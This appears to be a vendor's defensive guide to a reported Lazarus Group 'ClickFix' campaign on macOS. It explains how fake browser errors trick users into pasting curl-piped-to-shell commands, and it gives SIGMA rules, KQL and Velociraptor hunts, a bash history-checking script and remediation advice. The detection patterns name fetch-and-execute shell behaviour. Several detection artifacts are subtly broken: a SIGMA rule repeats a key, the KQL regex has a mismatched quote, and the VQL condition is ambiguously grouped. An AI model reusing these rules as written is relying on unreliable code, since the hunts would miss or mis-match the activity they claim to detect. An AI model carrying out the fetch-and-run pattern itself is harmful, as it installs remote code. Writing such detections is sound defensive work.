Lazarus Group ClickFix Campaign: macOS Defense & Detection Guide

The Lazarus Group (APT38), a North Korean state-sponsored threat actor notorious for financial theft and espionage, has expanded its "ClickFix" social engineering campaign to target macOS users. This evolution signals a strategic pivot to compromise Mac-centric organizations and their high-value executives—a demographic often perceived as 'low-hanging fruit' due to the historical lack of macOS-specific threat coverage in many SOCs.

The attack vector relies on sophisticated social engineering rather than an exploit. By serving fake browser error messages that instruct users to copy and paste malicious commands into the Terminal, Lazarus bypasses traditional perimeter defenses. For defenders, this is an urgent wake-up call: macOS environments are now squarely in the crosshairs of elite nation-state actors, and reliance on platform obscurity is a failed strategy.

Technical Analysis

Affected Platforms: macOS (Sonoma, Ventura, and earlier versions supported).

Threat Actor: Lazarus Group (APT38).

Attack Vector: Social Engineering (ClickFix).

Mechanism of Attack:

1. Lure: Victims are directed to malicious websites (often via SEO poisoning or credential phishing) hosting fake browser pop-ups. These pop-ups claim there is a critical error, such as an "Outdated Browser" or "Audio Driver Not Found."
2. Instruction: The pop-up provides a 'fix' in the form of a multi-line command block, explicitly instructing the user to open the Terminal application and paste the code.
3. Execution: The command typically uses curl to download a payload (often a shell script or a compiled Mach-O binary) from a remote server and pipes it directly into bash or sh for execution.
4. Payload: The payload establishes persistence (often via Launch Agents or Daemons), performs system reconnaissance, and exfiltrates data to C2 infrastructure.

Exploitation Status: Confirmed active exploitation in the wild.

Detection & Response

Detecting ClickFix on macOS requires identifying the specific sequence of a shell process (bash, sh, zsh) executing a web request (curl) via a pipe (|). While legitimate admin tasks use curl, piping directly to a shell interpreter is a high-risk anomaly indicative of malware installation or ClickFix activity.

SIGMA Rules

---
title: Potential ClickFix Activity - Curl Piped to Shell
id: 8a4b3c21-1d5e-4f9a-b6c7-8d9e0f1a2b3c
status: experimental
description: Detects the execution of curl piped directly to bash or sh, a common tactic in ClickFix campaigns to download and execute malicious payloads on macOS.
references:
  - https://attack.mitre.org/techniques/T1059/004/
  - https://www.darkreading.com/threat-intelligence/north-koreas-lazarus-targets-macos-users-clickfix
author: Security Arsenal
date: 2024/05/22
tags:
  - attack.execution
  - attack.t1059.004
logsource:
  category: process_creation
  product: macos
detection:
  selection:
    CommandLine|contains:
      - 'curl '
      - ' | '
    CommandLine|contains:
      - 'bash'
      - 'sh '
  condition: selection
falsepositives:
  - Legitimate administrative software installation scripts (rare in automated fashion)
level: high
---
title: Suspicious File Download via Terminal to writable directory
id: 9b5c4d32-2e6f-5a0b-c7d8-0e1f2a3b4c5d
status: experimental
description: Detects curl usage downloading files to common user-writeable temp or cache directories often used in ClickFix payloads.
references:
  - https://attack.mitre.org/techniques/T1105/
author: Security Arsenal
date: 2024/05/22
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: macos
detection:
  selection_img:
    Image|endswith:
      - '/curl'
      - '/wget'
  selection_cli:
    CommandLine|contains:
      - '/tmp/'
      - '/Users/Shared/'
      - 'Downloads/'
  condition: all of selection_*
falsepositives:
  - Legitimate user downloads via command line
level: medium

KQL (Microsoft Sentinel / Defender for Endpoint)

Microsoft Defender for Endpoint (MDE) provides robust telemetry for macOS. The following query hunts for the characteristic pipe behavior associated with ClickFix.

DeviceProcessEvents
| where Timestamp > ago(7d)
| where ActionType == "ProcessCreated"
| where DeviceType == "Mac"
| where ProcessCommandLine has "curl" 
| where ProcessCommandLine has "|" 
| where ProcessCommandLine has_any ("bash", "sh", "zsh")
| extend PipedCommand = extract(@\|(\s*\w+)(.*)", 1, ProcessCommandLine)
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, PipedCommand
| order by Timestamp desc

Velociraptor VQL

For endpoint triage, use this VQL artifact to hunt for processes that are currently running suspicious pipe commands or have recently spawned them. This is critical for identifying active intrusions on a compromised Mac.

-- Hunt for ClickFix behavior: curl piped to shell
SELECT Pid, Name, CommandLine, Exe, Username, CreateTime
FROM pslist()
WHERE CommandLine =~ 'curl.*\|.*(bash|sh|zsh)'
   OR Name IN ('bash', 'sh', 'zsh')
   AND CommandLine =~ 'curl'

Remediation Script (Bash)

This script aids responders in checking user shell histories for evidence of ClickFix commands (which are often typed manually by the victim) and verifying the integrity of common LaunchAgent persistence locations.

#!/bin/bash

# Response Script: macOS ClickFix Investigation
# Usage: sudo ./check_clickfix.sh

echo "[*] Checking shell histories for ClickFix indicators..."

# Check bash history for curl + pipe patterns
for user_home in /Users/*; do
    user=$(basename "$user_home")
    if [ "$user" != "Shared" ]; then
        echo "[+] Checking history for user: $user"
        # Check .zsh_history (default on modern macOS)
        if [ -f "$user_home/.zsh_history" ]; then
            grep -E "curl.*\|.*sh" "$user_home/.zsh_history" && echo "[!] ALERT: Suspicious command found in .zsh_history"
        fi
        # Check .bash_history
        if [ -f "$user_home/.bash_history" ]; then
            grep -E "curl.*\|.*sh" "$user_home/.bash_history" && echo "[!] ALERT: Suspicious command found in .bash_history"
        fi
    fi
done

echo "[*] Checking for suspicious LaunchAgents in user profiles..."

# Look for recently created/modified Launch Agents (last 7 days)
find /Users/*/Library/LaunchAgents -name "*.plist" -mtime -7 -ls 2>/dev/null

echo "[*] Checking /Users/Shared for payloads..."
ls -lah /Users/Shared/ | grep -E "\.(sh|py|plist)$"

echo "[*] Investigation complete."

Remediation

1. Block Script Execution via MDM: Utilize Mobile Device Management (MDM) solutions (e.g., Jamf Pro, Intune) to restrict the usage of Terminal.app and iTerm2 to standard users. Create a whitelist of privileged administrators who are permitted to use these utilities.

2. Network Filtering: Block outbound shell access (SSH) and unauthorized script downloads from the internet. Configure firewalls and proxies to inspect HTTPS traffic for suspicious shell script content.

3. User Awareness Training (Immediate): Issue a security advisory to all staff, specifically targeting executives and creative teams (common Mac users). Emphasize that legitimate technical support never asks users to copy-paste commands into Terminal.

4. Endpoint Detection and Response (EDR): Ensure Microsoft Defender for Endpoint or CrowdStrike Falcon is deployed on all macOS endpoints with "Shell Script" logging enabled.

5. Investigate Persistence Mechanisms: If an infection is suspected, immediately check ~/Library/LaunchAgents, /Library/LaunchAgents, and /Library/LaunchDaemons for unknown or recently modified .plist files.

Related Resources

Security Arsenal Red Team Services AlertMonitor Platform Book a SOC Assessment pen-testing Intel Hub